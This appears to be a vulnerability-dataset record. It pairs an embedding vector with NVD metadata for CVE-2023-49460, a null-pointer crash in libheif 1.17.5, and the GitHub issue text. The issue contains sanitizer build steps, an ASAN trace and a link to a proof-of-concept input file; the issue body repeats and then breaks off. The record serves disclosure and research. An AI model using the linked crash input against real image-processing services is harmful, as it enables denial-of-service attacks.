-0.013696251437067986, -0.0029423790983855724, -0.00941710639744997, 0.017265940085053444, -0.0033792550675570965, 0.0054478817619383335, 0.014920998364686966, 0.022613003849983215, -0.002438291208818555, 0.004566662013530731, 0.01950632967054844, 0.026227500289678574, -0.015727538615465164, 0.0057988762855529785, 0.023524096235632896, -0.010746404528617859, 0.003362452145665884, -0.0037881263997405767, -0.016593823209404945, -0.0017400362994521856, -0.002759413793683052, 0.00917066354304552, -0.006198412738740444, 0.0036761066876351833, -0.018938764929771423, -0.0033829892054200172, 0.00476456293836236, 0.013643976300954819, -0.0008728186367079616, 0.0014319827314466238, 0.010813616216182709, 0.017624402418732643, 0.007255129981786013, -0.020357677713036537, 0.010268454439938068, -0.019028380513191223, 0.005836216267198324, 0.016713310033082962, 0.008028064854443073, -0.012859839014708996, 0.00315148220397532, 0.033157773315906525, 0.007621060591191053, 0.00019323364540468901, -0.015772346407175064, -0.0068406579084694386, -0.007027356885373592, 0.002533507766202092, -0.002219853224232793, 0.00878232903778553, -0.015428819693624973, 0.015563243068754673, -0.01738542690873146, -0.00979797262698412, 0.00594076793640852, 0.008610566146671772, -0.007714409846812487, 0.003743318608030677, 0.004301548935472965, -0.009409638121724129, -0.022762363776564598, -0.01616067998111248, 0.02050703763961792, -0.011508136987686157, 0.0055711036548018456, 0.02512224204838276, 0.01108993124216795, -0.005522561725229025, 0.0011706037912517786, 0.005384404212236404, -0.00943951029330492, 0.0030712014995515347, -0.010970443487167358, -0.0055823056027293205, 0.013733591884374619, -0.004656277596950531, 0.00937229860574007, 0.014659618958830833, -0.0068742637522518635, -0.007456765044480562, -0.024465059861540794, -0.012971858493983746, -0.005608443170785904, 0.006355240009725094, 0.022762363776564598, 0.014965806156396866, -0.011007783934473991, -0.003965490497648716, -0.012172786518931389, -0.013748527504503727, 0.005559901706874371, -0.03453188017010689, 0.00039486875175498426, 0.0006077058496885002, 0.007367149461060762, 0.013076410628855228, 0.008379058912396431, -0.008476142771542072, -0.0054254778660833836, 0.00849107839167118, -0.017012029886245728, -0.0445389561355114, 0.014667087234556675, 0.015152505598962307, 0.00919306743890047, -0.015906769782304764, -0.00891675241291523, 0.0038908107671886683, -0.0025876506697386503, 0.00918559916317463, 0.01720619574189186, -0.011067527346313, -0.006769712083041668, -0.003720914712175727, -0.0028676993679255247, 0.0003019859141204506, 0.022881850600242615, 0.02534628100693226, 0.011284098029136658, 0.001930469530634582, -0.004958730190992355, 0.0026268574874848127, 0.00047328241635113955, -0.004510652273893356, -0.012254933826625347, 0.00628056051209569, 0.03707098960876465, -0.011194482445716858, 0.006997485179454088, -0.004667479544878006, -0.0068518598563969135, -0.0019547403790056705, 0.022418837994337082, 0.02099992334842682, 0.012187722139060497, -0.019252419471740723, -0.008401462808251381, 0.01828158274292946, -0.0056159114465117455, -0.021268770098686218, -0.025002753362059593, -0.01716138795018196, 0.017489979043602943, 0.01104512345045805, -0.015906769782304764, 0.005612177308648825, 0.00020420222426764667, 0.00990999210625887, -0.00040770432678982615, 0.012822499498724937, -0.026556091383099556, -0.009110920131206512, -0.017445171251893044, -0.0073335436172783375, 0.0004924190579913557, 0.012464037165045738, 0.026451539248228073, -0.03716060519218445, 0.022418837994337082, -0.0005199572187848389, -0.020297935232520103, -0.01056717336177826, -0.005537497811019421, 0.015772346407175064, -0.0066203526221215725, 0.002906906185671687, -0.014278752729296684, -0.027019105851650238, -0.013621572405099869, -0.001435716636478901, 0.010238583199679852, 0.015817154198884964, -0.010335666127502918, 0.01656395010650158, -0.0024886999744921923, -0.006825721822679043, -0.010104159824550152, -0.026287244632840157, -0.019581010565161705, -0.02005895972251892, -0.0030824034474790096, 0.023031210526823997, -0.009977203793823719, -0.01629510335624218, -0.01841600611805916, 0.0055337636731565, 0.001670024124905467, -0.0024999019224196672, -0.008834605105221272, -0.02349422499537468, -0.03051411360502243, -0.0007589321467094123, -0.001070719794370234, -0.012829967774450779, -0.018640045076608658, 0.028303595259785652, -0.004730957094579935, 0.006295496132224798, 0.017176324501633644, -0.007445563096553087, -0.00810274388641119, 0.0053620003163814545, -0.009999607689678669, -0.01778869703412056, -0.00499233603477478, -0.023389672860503197, -0.024913137778639793, 0.01571260206401348, -0.01716138795018196, -0.019715433940291405, -0.003248565597459674, 0.01253871712833643, -0.019849857315421104, -0.01271794829517603, -0.013897886499762535, 0.012210126034915447, 0.018117288127541542, 0.03196289762854576, -0.00585115235298872, 0.003791860304772854, 0.003140280256047845, 0.006818254012614489, -0.02951340563595295, -0.008774861693382263, -0.01629510335624218, -0.015861961990594864, 0.00480937073007226, -0.002322537824511528, -0.014704426750540733, -0.021059667691588402, 0.03321751579642296, 0.009558998048305511, -0.009297618642449379, 0.00926027912646532, 0.012284805998206139, -0.011216886341571808, 0.003429663833230734, 0.022015567868947983, -0.004294081125408411, -0.015876898542046547, 0.008677777834236622, 0.005096887703984976, 0.010514897294342518, -0.007486637216061354, 0.006583013106137514, -0.00044761126628145576, -0.028542570769786835, -0.00998467206954956, -0.02576448582112789, -0.014256348833441734, -0.016056129708886147, -0.001590676954947412, -0.00451438594609499, 0.007561316713690758, -0.00567192118614912, 0.007863769307732582, 0.01141105405986309, 0.020223254337906837, 0.025525512173771858, -0.005440413951873779, 0.012807563878595829, 0.006657692603766918, -0.00406257389113307, -0.016100937500596046, 0.0015412017237395048, -0.02661583386361599, 0.000693587469868362, -0.004096179734915495, -0.00939470250159502, -0.014308624900877476, -0.014428112655878067, -0.007397021632641554, 0.008155019953846931, -0.00020268528896849602, 0.015398948453366756, -0.020297935232520103, -0.01025351881980896, -0.0018119155429303646, -0.018684852868318558, 0.01143345795571804, 0.011149674654006958, -0.008423866704106331, 0.009738229215145111, 0.0005689657409675419, -0.013300449587404728, -0.0076621342450380325, 0.022881850600242615, 0.03082776814699173, -0.000735128007363528, -0.02743731066584587, 0.00882713682949543, -0.023285120725631714, 0.021164217963814735, 0.008506014943122864, -0.00458159763365984, -0.012635800056159496, -0.010402877815067768, 0.010350602678954601, -0.0014198472490534186, -0.0015019949059933424, -0.010290858335793018, 0.006153604947030544, 0.004264209419488907, -0.00503714382648468, 0.006310432218015194, 0.019088122993707657, 0.00017246336210519075, 0.001949139405041933, -0.0057876743376255035, 0.0005811011651530862, -0.0028060886543244123, 0.014853786677122116, 0.01571260206401348, -0.005664452910423279, 0.008789797313511372, -0.01156788133084774, 0.002436424372717738, -0.013009198941290379, -0.006265624426305294, -0.0031832209788262844, 0.014106989838182926, 0.008730053901672363, -0.022239606827497482, -0.0024289563298225403, 0.0036630379036068916, 0.009999607689678669, 0.007863769307732582, -0.0002816823835019022, 0.028184108436107635, -0.007423159200698137, 0.008274507708847523, 0.008296911604702473, -0.004693617112934589, 0.00392815051600337, 0.0005530962953343987, 0.00308427051641047, -0.012352017685770988, 0.015115165151655674, -0.008401462808251381, 0.004701085388660431, -0.0036088950000703335, 0.0038796088192611933, -0.007975788787007332, 0.007617326453328133, -0.02539108879864216, 0.02725807949900627, -0.015047953464090824, -0.009342426434159279, -0.006250688340514898, -0.006366441957652569, -0.003939352463930845, 0.03127584606409073, -0.03572675585746765, 0.0006114398129284382, -0.03187328204512596, 0.002232922241091728, 0.028452955186367035, 0.012254933826625347, -0.006246954668313265, -0.003532348433509469, 0.0034688706509768963, -0.010111627168953419, -0.00213397154584527, -0.010313262231647968, -0.004544258117675781, -0.014652151614427567, -0.00844627059996128, -0.01941671408712864, -0.008864477276802063, -0.004002830479294062, -0.02380787953734398, 0.011515605263411999, 0.002701536985114217, -0.051170509308576584, 0.0009306953870691359, 0.010768808424472809, -0.006448589731007814, 0.012045830488204956, -0.008528418838977814, -0.014853786677122116, 0.01262833271175623, 0.023374736309051514, 0.0018567233346402645, 0.006269358564168215, -0.019312163814902306, -0.00211156764999032, 0.0018651247955858707, -0.000055601347412448376, -0.01959594525396824, 0.007863769307732582, 0.0007822695770300925, -0.006317900028079748, -0.000014950520380807575, 0.0007640664116479456, 0.0222694780677557, -0.018669918179512024, 0.023479288443922997, 0.00213397154584527, 0.02625737152993679, 0.006131201051175594, -0.007535178679972887, -0.018759533762931824, 0.014577471651136875, -0.0016998960636556149, -0.008506014943122864, 0.028094492852687836, -0.02770615741610527, 0.01593664102256298, -0.009469382464885712, 0.0011510003823786974, 0.007004952989518642, 0.014570003375411034, 0.007449297234416008, -0.0003001189325004816, -0.0007874037837609649, 0.004114849958568811, 0.028482826426625252, 0.01271794829517603, -0.00867030955851078, -0.007438095286488533, 0.019267354160547256, 0.026287244632840157, 0.007796557620167732, -0.0009895056718960404, -0.001628950354643166, -0.01138865016400814, 0.007228991948068142, -0.00961874146014452, -0.002763147931545973, 0.0044546425342559814, 0.013868015259504318, 0.0215973611921072, -0.016713310033082962, 0.00542174419388175, 0.008976496756076813, -0.0054366798140108585, 0.007975788787007332, -0.006907869596034288, 0.014920998364686966, 0.01598144881427288, 0.0026268574874848127, 0.010836020112037659, -0.00526118278503418, -0.00157574110198766, -0.021627232432365417, 0.018625110387802124, -0.014017374254763126, 0.014696959406137466, -0.007729345932602882, -0.017982864752411842, 0.00426794309169054, -0.0016392187681049109, 0.019894665107131004, 0.004708553198724985, -0.008438803255558014, -0.0061610727570950985, 0.006004245486110449, 0.016922414302825928, -0.0019230014877393842, 0.014121925458312035, 0.011978618800640106, 0.022194799035787582, -0.014950870536267757, 0.012478972785174847, 0.010850955732166767, 0.00521637499332428, 0.0002597452257759869, 0.0024420253466814756, 0.00896156020462513, 0.004547991789877415, -0.01983492076396942, 0.018087416887283325, 0.00202008499763906, -0.0014907929580658674, 0.007983257062733173, -0.004805636592209339, -0.01584702543914318, 0.0025279067922383547, 0.00860309787094593, -0.003898278810083866, -0.00431275088340044, -0.031245974823832512, 0.0009316289215348661, -0.013166026212275028, -0.0111123351380229, 0.00399536220356822, -0.0226279404014349, -0.014846318401396275, 0.011440925300121307, 0.004387430846691132, 0.0026697982102632523, 0.01274035219103098, -0.00801312830299139, 0.008311847224831581, 0.011941279284656048, 0.001956607447937131, 0.0034856735728681087, -0.005858620163053274, 0.007016154937446117, -0.0015103963669389486, 0.0024420253466814756, -0.017489979043602943, -0.008685246109962463, -0.0004980200319550931, 0.02104473114013672, 0.000983904697932303, -0.01183672808110714, -0.0068854657001793385, -0.009693421423435211, -0.005294788628816605, -0.0005026875296607614, -0.002119035692885518, 0.017908185720443726, 0.0010221779812127352, 0.022075310349464417, 0.00417459337040782, 0.015876898542046547, -0.010679192841053009, 0.02861724980175495, -0.0021545086055994034, -0.023195505142211914, -0.009297618642449379, 0.022388964891433716, -0.0013881083577871323, 0.001111793564632535, -0.00846867449581623, -0.0015468026977032423, 0.012210126034915447, -0.0024774980265647173, -0.022209733724594116, 0.018864084035158157, -0.0030693344306200743, 0.014801510609686375, 0.002906906185671687, 0.00392815051600337, 0.002393483417108655, 0.004346356727182865, 0.006022915244102478, -0.015533371828496456, -0.0005736332386732101, -0.0018221839563921094, 0.016444463282823563, -0.015309332869946957, -0.00907357968389988, -0.0014543866273015738, 0.00267726625315845, -0.01828158274292946, -0.0007818028097972274, 0.006515801418572664, -0.016041193157434464, -0.02041742205619812, -0.010903231799602509, -0.0022366561461240053, 0.00803553219884634, 0.001206076703965664, 0.03698137402534485, -0.00064084492623806, 0.007960853166878223, 0.012389357201755047, -0.006288028322160244, 0.006762244272977114, 0.001828718464821577, 0.01049996167421341, 0.00993986427783966, -0.0040476382710039616, -0.0015281328232958913, -0.0026175223756581545, -0.011104866862297058, -0.003610762069001794, 0.003045063465833664, 0.027900325134396553, 0.01725100353360176, 0.013419936411082745, -0.009245343506336212, -0.02594371698796749, -0.006590480916202068, -0.015727538615465164, -0.013912823051214218, 0.005970639642328024, 0.01941671408712864, -0.002053690841421485, -0.013584231957793236, 0.006698766257613897, 0.007998192682862282, 0.011261694133281708, 0.004159657750278711, -0.003513678442686796, -0.02028299868106842, -0.007998192682862282, 0.009320022538304329, 0.014189137145876884, -0.004159657750278711, 0.03480072692036629, 0.019401779398322105, -0.02407672628760338, 0.005642049014568329, -0.032978542149066925, -0.010328198783099651, 0.01126916240900755, -0.025017689913511276, 0.00021727116836700588, -0.0011510003823786974, -0.03196289762854576, 0.02860231325030327, 0.012180253863334656, -0.019386842846870422, 0.0015701401280239224, -0.013083877973258495, -0.0021843803115189075, -0.00805793609470129, 0.009633677080273628, -0.003724648617208004, 0.008528418838977814, -0.007654666434973478, -0.02634698711335659, 0.010492493398487568, 0.012777691707015038, 0.006553140934556723, 0.016399655491113663, -0.033157773315906525, 0.0009110919781960547, 0.006306698080152273, 0.005698058754205704, 0.012576056644320488, 0.00825957115739584, -0.013390065170824528, 0.0108434883877635, -0.005552433431148529, 0.025420960038900375, 0.012680607847869396, -0.00794591661542654, 0.012807563878595829, 0.005324660334736109, 0.01197115145623684, 0.013248173519968987, 0.01861017383635044, -0.023479288443922997, -0.006456057541072369, 0.0008079406688921154, -0.004835508763790131, 0.002977851778268814, -0.012658203952014446, -0.011687368154525757, -0.0017213664250448346, -0.008700181730091572, 0.010507429949939251, 0.0025503106880933046, -0.00499233603477478, -0.02775096520781517, -0.0213285144418478, 0.01170230470597744, -0.006067723035812378, -0.003392324084416032, -0.004954996053129435, -0.0013050272827968001, -0.0032896394841372967, 0.0021545086055994034, -0.0006151737761683762, 0.008087808266282082, 0.014898594468832016, -0.0040476382710039616, 0.02304614707827568, -0.011194482445716858, -0.00011534508666954935, -0.01974530518054962, 0.009469382464885712, 0.014226477593183517, -0.02453974075615406, -0.007647198159247637, 0.017086708918213844, -0.011082462966442108, -0.008618034422397614, -0.023255249485373497, -0.0036182301118969917, 0.018864084035158157, 0.010746404528617859, -0.006119999103248119, -0.013397532515227795, -0.0077592176385223866, 0.015742475166916847, -0.0008466807776130736, 0.008662842214107513, 0.009760633111000061, 0.006627820897847414, -0.0017251004464924335, 0.001006308593787253, 0.013651443645358086, 0.005515093915164471, 0.002533507766202092, 0.005186503287404776, -0.009693421423435211, 0.01769908145070076, 0.007326075807213783, 0.0004294081008993089, 0.016369784250855446, -0.004279145039618015, -0.0003743318375200033, 0.01095550786703825, -0.019536202773451805, -0.007818961516022682, 0.010649320669472218, 0.013539424166083336, 0.008416399359703064, -0.005197705235332251, 0.0034427328500896692, -0.00961874146014452, -0.004734691232442856, 0.024002045392990112, 0.00010355970152886584, 0.0041559236124157906, -0.007774153724312782, 0.0026137884706258774, 0.002412153407931328, 0.00926027912646532, -0.005981841590255499, -0.00849107839167118, 0.015428819693624973, -0.01025351881980896, -0.009499253705143929, 0.0032971075270324945, -0.001096857711672783, -0.028542570769786835, 0.002367345616221428, -0.032351233065128326, 0.030529050156474113, 0.014928466640412807, 0.006508333142846823, -0.02837827429175377, 0.004768297076225281, -0.004656277596950531, 0.015234652906656265, -0.006680096499621868, -0.025973590090870857, 0.002593251643702388, -0.024091660976409912, -0.010940572246909142, -0.003513678442686796, -0.004036436323076487, -0.0016270832857117057, -0.012971858493983746, -0.004256741143763065, -0.017131516709923744, -0.011933811008930206, -0.0011566013563424349, 0.035696882754564285, 0.007367149461060762, 0.0077592176385223866, 0.012837435118854046, -0.0037993283476680517, -0.03232135996222496, 0.00047981689567677677, -0.0032392307184636593, 0.03518906235694885, -0.01005188375711441, -0.01163509301841259, -0.013748527504503727, 0.014002438634634018, -0.008595630526542664, -0.022881850600242615, -0.0005965038435533643, -0.013733591884374619, 0.012665672227740288, -0.008155019953846931, 0.01669837348163128, 0.0010007076198235154, 0.010156434960663319, 0.00258578360080719, 0.022299349308013916, 0.018819276243448257, 0.00878232903778553, 0.019222546368837357, -0.010679192841053009, 0.003739584470167756, -0.004215667489916086, 0.00528358668088913, 0.005903427954763174, -0.00918559916317463, 0.017086708918213844, -0.003935618791729212, -0.0005675654974766076, -0.008969028480350971, -0.0004735157999675721, -0.00796832051128149, 0.014525195583701134, 0.0218214001506567, 0.011030187830328941, -0.005268650595098734, 0.005683123134076595, 0.003536082338541746, 0.012986795045435429, -0.01981998421251774, -0.019581010565161705, -0.0032410977873951197, -0.005123025272041559, -0.004279145039618015, -0.0012695543700829148, 0.0029106400907039642, -0.022015567868947983, -0.0058212801814079285, -0.016877606511116028, 0.0029759849421679974, 0.015518435277044773, -0.006859327666461468, 0.015458691865205765, 0.022030502557754517, 0.03435264900326729, -0.0112915663048625, -0.00028845021734014153, 0.00873752124607563, 0.019312163814902306, -0.00950672198086977, 0.014570003375411034, -0.02503262646496296, -0.008685246109962463, 0.020029088482260704, -0.008476142771542072, 0.004477046430110931, 0.003407259937375784, 0.0032747036311775446, 0.010828551836311817, -0.003784392261877656, -0.009835313074290752, 0.00616854103282094, 0.009603805840015411, 0.01262833271175623, 0.00551135977730155, -0.007281268015503883, -0.0024999019224196672, -0.00569432508200407, -0.01122435461729765, 0.010223646648228168, 0.01865498162806034, -0.008461207151412964, 0.02313576266169548, 0.007632262539118528, -0.001572007080540061, 0.006187210790812969, 0.01720619574189186, -0.011194482445716858, 0.0014562535798177123, 0.027676286175847054, 0.020268062129616737, 0.0029274430125951767, 0.01964075304567814, 0.009954799897968769, -0.0026940691750496626, 0.009290151298046112, 0.017938056960701942, 0.01025351881980896, 0.0018100484739989042, 0.011754579842090607, -0.008573226630687714, -0.00018984972848556936, -0.014711895026266575, 0.028587378561496735, 0.0005820346996188164, 0.004861646797508001, -0.008416399359703064, 0.003155216109007597, 0.0214181300252676, 0.04797422140836716, 0.00012858906120527536, 0.00003847753396257758, -0.01113473903387785, 0.007471701130270958, -0.008946624584496021, -0.02095511555671692, 0.02607814036309719, -0.001930469530634582, 0.007053494919091463, 0.011351309716701508, 0.0014749234542250633, 0.005347064230591059, -0.009402170777320862, 0.0041036480106413364, 0.004182061646133661, 0.02634698711335659, 0.007721878122538328, -0.02716846391558647, 0.00035892915911972523, 0.0106642572209239, -0.00469735125079751, 0.009536594152450562, 0.013584231957793236, 0.007841365411877632, -0.010402877815067768, -0.015548307448625565, -0.007378351408988237, -0.01865498162806034, -0.014211541041731834, -0.005074483808130026, -0.012172786518931389, -0.0018501888262107968, -0.007550114765763283, 0.0035958262160420418, -0.007176716346293688, -0.018819276243448257, -0.00231506978161633, -0.0018100484739989042, 0.018669918179512024, -0.04406100511550903, -0.01258352492004633, -0.018669918179512024, 0.007038558833301067, 0.0035939591471105814, 0.0004858846077695489, -0.010679192841053009, -0.008393995463848114, -0.01256112102419138, 0.013770931400358677, -0.004346356727182865, 0.006429919507354498, -0.012419229373335838, 0.01091070007532835, 0.00107818772085011, 0.0008392127929255366, -0.02431569993495941, -0.003838535165414214, 0.03668265417218208, 0.016130808740854263, 0.013434872962534428, 0.030887512490153313, -0.0024420253466814756, 0.01141105405986309, 0.012882242910563946, 0.011986087076365948, -0.008632970042526722, -0.008423866704106331, 0.003924416843801737, 0.0020070162136107683, 0.0011967417085543275, -0.02779577299952507, -0.006388845853507519, 0.00027701491490006447, 0.0008018729859031737, -0.0005778339691460133, -0.003452067729085684, -0.00528732081875205, -0.004025234375149012, 0.010507429949939251, -0.00955152977257967, -0.001790445065125823, 0.010089223273098469, 0.009297618642449379, 0.011754579842090607, -0.00415218947455287, -0.020118704065680504, 0.00582874845713377, -0.005526295863091946, 0.008991432376205921, -0.01792312040925026, -0.018998507410287857, -0.03232135996222496, 0.004323952831327915, 0.006709968205541372, 0.00987265259027481, -0.020357677713036537, -0.0007911377470009029, 0.015727538615465164, -0.01769908145070076, 0.016220424324274063, -0.0037825254257768393, 0.008662842214107513, 0.010970443487167358, -0.011149674654006958, 0.014420644380152225, 0.003864672966301441, 0.006456057541072369, 0.018804341554641724, -0.018162095919251442, -0.02005895972251892, -0.02286691591143608, -0.007960853166878223, 0.003347516292706132, -0.003698510816320777, -0.016683438792824745, 0.008812201209366322, -0.04068548604846001, -0.025047561153769493, 0.02046222984790802, 0.017370492219924927, 0.015354140661656857, 0.022015567868947983, -0.0028210245072841644, -0.010193775407969952, -0.019939472898840904, 0.015324268490076065, 0.008722585625946522, 0.0017773761646822095, -0.009768101386725903, 0.0053993402980268, 0.019894665107131004, -0.010791212320327759, -0.017355555668473244, 0.05469539016485214, 0.01968556083738804, 0.03181353956460953, -0.0028340935241431, 0.013554360717535019, 0.010903231799602509, -0.005507625639438629, -0.015817154198884964, -0.00630296440795064, -0.004297815263271332, 0.004723489284515381, -0.011231822893023491, 0.004734691232442856, 0.002005149144679308, -0.0049139223992824554, 0.010440218262374401, 0.00034259300446137786, 0.001993947196751833, -0.0066315545700490475, -0.015257056802511215, -0.023568904027342796, 0.007916045375168324, 0.03638393431901932, -0.01192634366452694, 0.014308624900877476, 0.00988758821040392, 0.007818961516022682, -0.008506014943122864, 0.015548307448625565, 0.004099913872778416, 0.02810942754149437, -0.0055785714648664, -0.012127978727221489, 0.02548070438206196, 0.013083877973258495, 0.010918167419731617, 0.009544061496853828, 0.019431650638580322, 0.007893641479313374, 0.010380473919212818, 0.008662842214107513, 0.015428819693624973, -0.00959633756428957, 0.012232529930770397, -0.003765722503885627, 0.007285001687705517, 0.005141695495694876, 0.018177032470703125, 0.021403193473815918, 0.0021657105535268784, 0.0037563873920589685, 0.013173493556678295, -0.008685246109962463, 0.008386527188122272, -0.00907357968389988, -0.00010215945803793147, -0.009835313074290752, 0.003313910448923707, -0.011284098029136658, -0.00966354925185442, -0.009013836272060871, -0.00921547133475542, -0.011067527346313, -0.001730701420456171, -0.025361215695738792, -0.01011909544467926, 0.01152307353913784, 0.010783744044601917, -0.01992453634738922, 0.025704743340611458, -0.00017806433606892824, 0.0034483338240534067, -0.0018968636868521571, 0.003943086601793766, -0.00444717425853014, -0.021059667691588402, 0.014891126193106174, -0.007019889075309038, 0.007016154937446117, 0.014159265905618668, -0.013434872962534428, 0.0012266136473044753, 0.014017374254763126, -0.009454445913434029, 0.008028064854443073, -0.01725100353360176, -0.0014077117666602135, -0.007318607531487942, -0.010925635695457458, 0.01970049738883972, 0.012508844956755638, 0.003683574730530381, -0.016399655491113663, 0.00435755867511034, 0.0078040254302322865, -0.015742475166916847, -0.018117288127541542, -0.009088516235351562, 0.0037675893399864435, 0.00580634456127882, -0.011030187830328941, 0.021448001265525818, -0.012090638279914856, -0.00116873683873564, 0.02427089214324951, -0.018401071429252625, -0.006187210790812969, -0.00285836448892951, -0.008662842214107513, 0.008311847224831581, 0.0000010538293508943752, 0.0007827362860552967, -0.020566781982779503, -0.0016270832857117057, 0.018505621701478958, 0.015443756245076656, -0.0030581324826925993, 0.00021470405044965446, 0.007729345932602882, -0.0007495972095057368, -0.011582816950976849, -0.021433064714074135, 0.03483060002326965, 0.02494301088154316, 0.009469382464885712, -0.004462110344320536, 0.0005176234408281744, 0.023912429809570312, -0.002481232164427638, 0.004372494760900736, -0.001601878902874887, -0.03064853698015213, 0.003235496813431382, 0.02082069218158722, 0.012105574831366539, 0.021582424640655518, -0.00975316483527422, 0.01056717336177826, 0.013614104129374027, -0.008177423849701881, -0.0027426108717918396, 0.049408070743083954, 0.001240616082213819, 0.0037713234778493643, -0.005403073970228434, 0.007139376364648342, -0.006807052064687014, -0.0006893867393955588, 0.0007556648924946785, -0.029573149979114532, 0.00825957115739584, 0.018401071429252625, 0.005858620163053274, 0.0004455109010450542, 0.0017512382473796606, 0.009424574673175812, 0.033575981855392456, 0.01593664102256298, -0.020387550815939903, 0.019162803888320923, -0.002824758645147085, 0.005268650595098734, -0.010970443487167358, 0.007871237583458424, 0.0019659423269331455, 0.002333739772439003, -0.0023281387984752655, 0.007774153724312782, 0.002031286945566535, -0.005769004579633474, -0.008901816792786121, -0.009633677080273628, 0.006549407262355089, -0.012419229373335838, 0.012001022696495056, 0.015428819693624973, 0.018460813909769058, 0.0009867051849141717, 0.015384011901915073, 0.0020406220573931932, 0.022807171568274498, -0.0015215983148664236, -0.015906769782304764, 0.016638631001114845, 0.043612927198410034, 0.0011444659903645515, -0.01996934413909912, -0.011754579842090607, 0.01751985028386116, 0.00977556873112917, 0.004678681492805481, -0.027108721435070038, 0.004114849958568811, 0.009558998048305511, -0.008341719396412373, 0.021074602380394936, 0.030678408220410347, -0.006418717559427023, 0.015309332869946957, -0.014390772208571434, 0.005223842803388834, -0.016713310033082962, -0.025092368945479393, 0.023792942985892296 ]
CVE-2023-49460
2023-12-07T20:15:38.140000
libheif v1.17.5 was discovered to contain a segmentation violation via the function UncompressedImageCodec::decode_uncompressed_image.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/issues/1046" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libheif:1.17.5:*:*:*:*:*:*:*", "matchCriteriaId": "8776EE2B-B4B8-4509-BC0C-3668329FF6C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/strukturag/libheif/issues/1046
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libheif" ]
### Description AddressSanitizer: SEGV in `decode_uncompressed_image` ### Version ``` commit: 64ece913266609789f5dc70fe7de9eb759badd7f heif-convert libheif version: 1.17.5 ------------------------------------------- Usage: heif-convert [options] <input-image> [output-image] The program determines the output file format from the output filename suffix. These suffixes are recognized: jpg, jpeg, png, y4m. If no output filename is specified, 'jpg' is used. Options: -h, --help show help -v, --version show version -q, --quality quality (for JPEG output) -o, --output FILENAME write output to FILENAME (optional) -d, --decoder ID use a specific decoder (see --list-decoders) --with-aux also write auxiliary images (e.g. depth images) --with-xmp write XMP metadata to file (output filename with .xmp suffix) --with-exif write EXIF metadata to file (output filename with .exif suffix) --skip-exif-offset skip EXIF metadata offset bytes --no-colons replace ':' characters in auxiliary image filenames with '_' --list-decoders list all available decoders (built-in and plugins) --quiet do not output status messages to console -C, --chroma-upsampling ALGO Force chroma upsampling algorithm (nn = nearest-neighbor / bilinear) --png-compression-level # Set to integer between 0 (fastest) and 9 (best). Use -1 for default. ``` ### Replay ``` cd libheif mkdir build && cd build CC="gcc -fsanitize=address" CXX="g++ -fsanitize=address" cmake -DCMAKE_BUILD_TYPE=Debug -DWITH_UNCOMPRESSED_CODEC=ON .. make -j ./examples/heif-convert ./poc test.png ``` ### ASAN ``` ==89344==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f955d086aeb bp 0x7ffdd923ebb0 sp 0x7ffdd923e318 T0) ==89344==The signal is caused by a READ memory access. ==89344==Hint: address points to the zero page. #0 0x7f955d086aea in memcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbaea) #1 0x7f955d85f4de (/lib/x86_64-linux-gnu/libasan.so.4+0x7a4de) #2 0x7f955d6f8495 in UncompressedImageCodec::decode_uncompressed_image(std::shared_ptr<HeifFile const> const&, unsigned int, std::shared_ptr<HeifPixelImage>&, unsigned int, unsigned int, std::vector<unsigned char, std::allocator<unsigned char> > const&) libheif/libheif/uncompressed_image.cc:758 #3 0x7f955d5b7304 in HeifContext::decode_image_planar(unsigned int, std::shared_ptr<HeifPixelImage>&, heif_colorspace, heif_decoding_options const&, bool) const libheif/libheif/context.cc:1452 #4 0x7f955d5b42a8 in HeifContext::decode_image_user(unsigned int, std::shared_ptr<HeifPixelImage>&, heif_colorspace, heif_chroma, heif_decoding_options const&) const libheif/libheif/context.cc:1248 #5 0x7f955d5771f4 in heif_decode_image libheif/libheif/heif.cc:1044 #6 0x55e9351aca11 in main libheif/examples/heif_convert.cc:484 #7 0x7f955cfef082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #8 0x55e9351a7add in _start (libheif/build/examples/heif-convert+0xbadd) ``` ### POC - [poc](https://github.com/fdu-sec/poc/raw/main/libheif/poc5) ### Environment ``` Description: Ubuntu 22.04.2 LTS gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0 ``` ### Credit Yuchuan Meng ([Fudan University](https://secsys.fudan.edu.cn/))
AddressSanitizer: SEGV in `decode_uncompressed_image`
https://api.github.com/repos/strukturag/libheif/issues/1046/comments
2
2023-11-22T12:10:09
2023-12-14T15:36:32Z
https://github.com/strukturag/libheif/issues/1046
2,006,207,463
1,046
true
This is a GitHub Issue repo:libheif owner:strukturag Title : AddressSanitizer: SEGV in `decode_uncompressed_image` Issue date: --- start body --- ### Description AddressSanitizer: SEGV in `decode_uncompressed_image` ### Version ``` commit: 64ece913266609789f5dc70fe7de9eb759badd7f heif-convert libheif version: 1.17.5 ------------------------------------------- Usage: heif-convert [options] <input-image> [output-image] The program determines the output file format from the output filename suffix. These suffixes are recognized: jpg, jpeg, png, y4m. If no output filename is specified, 'jpg' is used. Options: -h, --help show help -v, --version show version -q, --quality quality (for JPEG output) -o, --output FILENAME write output to FILENAME (optional) -d, --decoder ID use a specific decoder (see --list-decoders) --with-aux also write auxiliary images (e.g. depth images) --with-xmp write XMP metadata to file (output filename with .xmp suffix) --with-exif write EXIF metadata to file (output filename with .exif suffix) --skip-exif-offset skip EXIF metadata offset bytes --no-colons replace ':' characters in auxiliary image filenames with '_' --list-decoders list all available decoders (built-in and plugins) --quiet do not output status messages to console -C, --chroma-upsampling ALGO Force chroma 